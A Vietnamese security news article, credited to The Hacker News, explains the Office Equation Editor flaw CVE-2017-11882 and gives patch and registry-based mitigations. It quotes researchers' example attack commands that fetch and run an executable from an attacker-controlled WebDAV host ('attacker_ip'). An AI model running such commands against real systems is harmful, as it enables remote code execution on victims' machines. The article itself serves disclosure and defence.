Hãy cẩn thận khi mở các tệp trong Ms Office, đặc biệt là từ trên mạng.
Trong khi thế giới vẫn đang đối mặt với nguy cơ lỗ hổng bảo mật “built-in DDE featured” của Microsoft Office, các nhà nghiên cứu đã phát hiện ra một vấn đề nghiêm trọng trong một thành phần office khác, có thể cho phép kẻ tấn công cài đặt phần mềm độc hài từ xa lên máy tính nạn nhân.
Lỗ hổng này liên quan đến việc quản lý bộ nhớ, tồn tài trong tất cả các phiên bản Office từ office 2000 trở đi, bao gồm cả office 365, và hoạt động trên tất cả các hệ điều hành windows.
Lỗ hổng được đặt tên là CVE-2017-11882, Nằm trong EQNEDT32.EXE, một thành phần của MS Office chịu trách nhiệm chèn và chỉnh sửa các công thức toán học (đối tượng OLE) trong tài liệu. Tuy nhiên do hoạt động của bộ nhớ không đúng, các thành phần này không xử lý đúng đối tượng trong bộ nhớ dẫn đến lỗi, do đó cho phép kẻ tấn công thực thi mã độc ngay trên máy nạn nhân mà nạn nhân không hề hay biết, ngay khi nạn nhẩn mở tài liệu độc hại.
Mười bảy năm về trước, EQNEDT32.EXE đã được giới thiệu trong Microsoft Office 2000. Phần mềm nhỏ này được lưu giữ trong tất cả các phiên bản được phát hành sau khi Microsoft Office 2007, để đảm bảo phần mềm vẫn tương thích với các tài liệu của các phiên bản cũ hơn.
Để khai thác lỗ hổng này, kẻ tấn công phải lừa được người dùng mở file office đã chỉnh sửa chèn mã độc hại.
Lỗ hổng này có thể bị khai thác để kiểm soát hoàn toàn một hệ thống khi kết hợp với cách khai thác chiếm quyền Windows Kernel (như CVE-2017-11847).
Một kịch bản khả dụng có thể xảy ra như sau:
Trong khi giải thích phạm vi của lỗ hổng, các nhà nghiên cứu của Embedi đề xuất một số kịch bản tấn công được liệt kê dưới đây:
“Bằng cách chèn một vài đối tượng OLE, để khai khác lỗ hổng này, nó có thể thực hiện một chuỗi các lệnh tùy ý (ví dụ như tải một tập tin tùy ý từ Internet và thực hiện nó). “
“Một trong những cách đơn giản nhất để thực thi mã tùy ý là khởi chạy một tệp thực thi từ máy chủ WebDAV do kẻ tấn công kiểm soát.”
Ví dụ: một kẻ tấn công có thể sử dụng lỗ hổng này để thực hiện các lệnh như cmd.exe / c start \\ attacker_ip \ ff. Lệnh này chỉ là 1 phần của kế hoạch tấn công, nhờ đó kết nối và kích hoạt mã độc khác . “
“Sau đó, kẻ tấn công có thể chạy một tập tin thực thi từ máy chủ WebDAV bằng cách sử dụng lệnh \\ attacker_ip \ ff \ 1.exe Cơ chế bắt đầu của một tập tin thực thi tương tự như của \\ live.sysinternals.com \ tools service “.
Cách phòng tránh lỗ hổng.
Với bản sửa lỗi này, Microsoft đã giải quyết lỗ hổng này bằng cách thay đổi cách phần mềm bị ảnh hưởng xử lý bộ nhớ.
Do đó để phòng tránh, người dùng nên tải bản sửa lỗi bảo mật vào tháng 11 càng sớm càng tốt để giữ cho máy tính được an toàn trước tin tặc.
Vì thành phần này có một số vấn đề về bảo mật có thể dễ dàng bị khai thác, vô hiệu hóa nó có thể là cách tốt nhất để đảm bảo an ninh hệ thống của bạn.
Sửa lỗi ngay từ dòng lệnh Command Prompt:
Với bản 64bit:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Với bản 32 bit:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Bên cạnh đó, người dùng cũng nên kích hoạt tính năng Protected View (hộp cát Microsoft Office) để ngăn chặn việc thực hiện nội dung hoạt động (OLE / ActiveX / Macro).
Theo: The Hacker News: https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html
Xem thêm:
Các ứng dụng Android trong Cửa hàng Google Play Tận dụng sự bùng phát của coronavirus
7 cách tin tặc và kẻ lừa đảo đang khai thác coronavirus